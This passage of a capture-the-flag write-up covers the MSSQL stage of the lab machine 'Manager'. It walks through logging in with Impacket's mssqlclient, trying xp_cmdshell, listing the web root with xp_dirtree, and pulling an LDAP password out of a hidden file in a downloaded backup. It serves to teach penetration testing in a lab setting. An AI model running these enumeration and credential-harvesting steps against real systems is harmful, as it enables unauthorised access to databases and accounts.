MSSQL - 1433

Using the credentials found using password spray I can use it to login to the MSSQL instance.

mssqlclient.py [email protected] -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)> select name from sys.databases
name     
------   
master   

tempdb   

model    

msdb     

SQL (MANAGER\Operator  guest@master)>

Nothing crazy, all standard dbs.

SQL (MANAGER\Operator  guest@master)> enable_xp_cmdshell
ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.

So xp_cmdshell did not work.

SQL (MANAGER\Operator  guest@master)> xp_dirtree C:/
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   

Documents and Settings          1      0   

inetpub                         1      0   

PerfLogs                        1      0   

Program Files                   1      0   

Program Files (x86)             1      0   

ProgramData                     1      0   

Recovery                        1      0   

SQL2019                         1      0   

System Volume Information       1      0   

Users                           1      0   

Windows                         1      0

But we can run xp_dirtree to read local files!

SQL (MANAGER\Operator  guest@master)> xp_dirtree C:/inetpub
subdirectory   depth   file   
------------   -----   ----   
custerr            1      0   

history            1      0   

logs               1      0   

temp               1      0   

wwwroot            1      0   

SQL (MANAGER\Operator  guest@master)> xp_dirtree C:/inetpub/wwwroot
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   

contact.html                          1      1   

css                                   1      0   

images                                1      0   

index.html                            1      1   

js                                    1      0   

service.html                          1      1   

web.config                            1      1   

website-backup-27-07-23-old.zip       1      1

We can see the files that are on the web root. And because they are on the web root we can access them by browsing. I was able to download the backup file. Its a zip file and after unzipping it:

ls -la           
total 68
drwxrwxr-x 5 anonmak9 anonmak9  4096 Feb  6 02:14 .
drwxrwxr-x 5 anonmak9 anonmak9  4096 Feb  6 02:14 ..
-rw-rw-r-- 1 anonmak9 anonmak9  5386 Jul 27  2023 about.html
-rw-rw-r-- 1 anonmak9 anonmak9  5317 Jul 27  2023 contact.html
drwxrwxr-x 2 anonmak9 anonmak9  4096 Feb  6 02:14 css
drwxrwxr-x 2 anonmak9 anonmak9  4096 Feb  6 02:14 images
-rw-rw-r-- 1 anonmak9 anonmak9 18203 Jul 27  2023 index.html
drwxrwxr-x 2 anonmak9 anonmak9  4096 Feb  6 02:14 js
-rw-rw-r-- 1 anonmak9 anonmak9   698 Jul 27  2023 .old-conf.xml
-rw-rw-r-- 1 anonmak9 anonmak9  7900 Jul 27  2023 service.html
                                                                                                                                                                                             
┌──(anonmak9㉿anonmak9)-[~/Desktop/manager/website-backup]
└─$ cat .old-conf.xml 
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>[email protected]</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>

It was a hidden file! Always run ls -la instead of just ls.

And we get our first pair of credentials: raven@R4v3nBe5tD3veloP3r!123

Credentialed - raven

mssqlclient.py [email protected] -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Raven  guest@master)> enable_xp_cmdshell
ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.

We know from LDAP enumeration that this user has RDP access. So I tried evil-winrm, again.

PreviousLDAP - 389 NextFoothold

Last updated 12 months ago

hashtagCredentialed - raven

Credentialed - raven